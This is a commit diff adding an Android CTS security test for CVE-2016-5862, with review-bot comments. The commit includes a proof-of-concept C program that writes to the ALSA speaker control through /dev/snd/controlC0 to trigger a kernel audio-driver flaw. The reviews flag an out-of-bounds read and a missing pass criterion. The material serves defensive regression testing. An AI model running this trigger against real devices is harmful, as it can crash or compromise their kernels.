CTS test for Android Security b/72460381
Test: successful run of newly introduced CTS test case.
Bug: 72460381
Change-Id: Ic0bc4716dfbbe8df69213cf6fb0d6b7814cc7303
(cherry picked from commit 12f3bdffd12212fdf27493aa11f1cac65bbaea06)
(cherry picked from commit ad87647d7122a211376d0384266c1b309bd30b7f)
diff --git a/hostsidetests/securitybulletin/AndroidTest.xml b/hostsidetests/securitybulletin/AndroidTest.xml
index 6878d30..f0eb1f7 100644
--- a/hostsidetests/securitybulletin/AndroidTest.xml
+++ b/hostsidetests/securitybulletin/AndroidTest.xml
@@ -127,6 +127,7 @@
<!--__________________-->
<!-- Bulletin 2017-05 -->
<!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+ <option name="push" value="CVE-2016-5862->/data/local/tmp/CVE-2016-5862"/>
<!--__________________-->
<!-- Bulletin 2017-06 -->
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-5862/Android.mk b/hostsidetests/securitybulletin/securityPatch/CVE-2016-5862/Android.mk
new file mode 100644
index 0000000..c368779
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2016-5862/Android.mk
@@ -0,0 +1,16 @@
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-5862
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+LOCAL_COMPATIBILITY_SUITE := cts sts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+LOCAL_CFLAGS := -Wall -Werror
+
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-5862/poc.c b/hostsidetests/securitybulletin/securityPatch/CVE-2016-5862/poc.c
new file mode 100644
index 0000000..238bb0b
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2016-5862/poc.c
@@ -0,0 +1,56 @@
+/*
+ * CVE-2016-5862
+ */
+
+#include "../includes/common.h"
+#include <fcntl.h>
+#include <sound/asound.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/ioctl.h>
+#include <unistd.h>
+
+#define SPEAKER "Speaker Function"
+#define NUM_BLOCKS 16384
+
+unsigned int get_speakerid(int fd) {
+ unsigned int i;
+ int ret = -1;
+ unsigned int id = 0;
+ struct snd_ctl_elem_list lst;
+ memset(&lst, 0, sizeof(lst));
+ lst.pids = calloc(NUM_BLOCKS, sizeof(struct snd_ctl_elem_list));
+ lst.space = NUM_BLOCKS;
+ ret = ioctl(fd, SNDRV_CTL_IOCTL_ELEM_LIST, &lst);
+ if (ret < 0) {
+ return 0;
+ }
+ for (i = 0; i < lst.count; i++) {
+ if (!strncmp((const char *)lst.pids[i].name, SPEAKER,
+ (sizeof(SPEAKER) - 1))) {
+ id = lst.pids[i].numid;
+ break;
+ }
+ }
+ free(lst.pids);
+ return id;
+}
+
+int main(){
+ int fd = -1;
+ struct snd_ctl_elem_value control;
+ fd = open("/dev/snd/controlC0", O_RDWR);
+ if(fd < 0) {
+ return EXIT_FAILURE;
+ }
+ memset(&control, 0, sizeof(control));
+ control.id.numid = get_speakerid(fd);
+ if(control.id.numid == 0) {
+ close(fd);
+ return EXIT_FAILURE;
+ }
+ ioctl(fd,SNDRV_CTL_IOCTL_ELEM_WRITE,&control);
+ close(fd);
+ return EXIT_SUCCESS;
+}
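Review bot: In get_speakerid the loop runs to `lst.count`, which the ALSA control interface reports as the total number of elements on the card, while only `lst.used` entries (at most `lst.space`) are written into `lst.pids`; on a card exposing more than NUM_BLOCKS elements the name comparison would read past the allocation, so the bound should be `lst.used`. The calloc before it sizes each entry as `struct snd_ctl_elem_list` although `pids` holds `struct snd_ctl_elem_id` entries, its result is never checked, and the early `return 0` after a failed ioctl leaks the buffer. The fence below shows these changes together. Separately, main() discards the result of the SNDRV_CTL_IOCTL_ELEM_WRITE call; a one-line comment saying the test only cares whether the device survives the call would make that intent explicit.

```c
  /* … unchanged: local declarations and memset of lst … */
  lst.pids = calloc(NUM_BLOCKS, sizeof(*lst.pids));
  if (lst.pids == NULL) {
    return 0;
  }
  lst.space = NUM_BLOCKS;
  ret = ioctl(fd, SNDRV_CTL_IOCTL_ELEM_LIST, &lst);
  if (ret < 0) {
    free(lst.pids);
    return 0;
  }
  for (i = 0; i < lst.used; i++) {
  /* … unchanged: name comparison, free(lst.pids) and return id … */
```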
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_05.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_05.java
index 7db0580..eb7b29f 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_05.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_05.java
@@ -50,4 +50,14 @@
}, null);
}
}
+
+ /*
+ * CVE-2016-5862
+ */
+ @SecurityTest(minPatchLevel = "2017-05")
+ public void testPocCVE_2016_5862() throws Exception {
+ if (containsDriver(getDevice(), "/dev/snd/controlC0")) {
+ AdbUtils.runPocNoOutput("CVE-2016-5862",getDevice(), 60);
+ }
+ }
}
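Review bot: testPocCVE_2016_5862 contains no assertion, so nothing in this hunk states what makes the test fail. The PoC returns EXIT_FAILURE both when `/dev/snd/controlC0` cannot be opened and when no "Speaker Function" element is found, and `runPocNoOutput` appears not to surface that status, so a device where the write is never issued presumably passes the same way as a patched one. I would document the pass criterion above the call, for example `// Passes if the device survives the ELEM_WRITE; the PoC exit status is not checked.`, after confirming it against the harness. As a style point, `"CVE-2016-5862",getDevice()` is missing the space after the comma. The enclosing class starts outside this hunk.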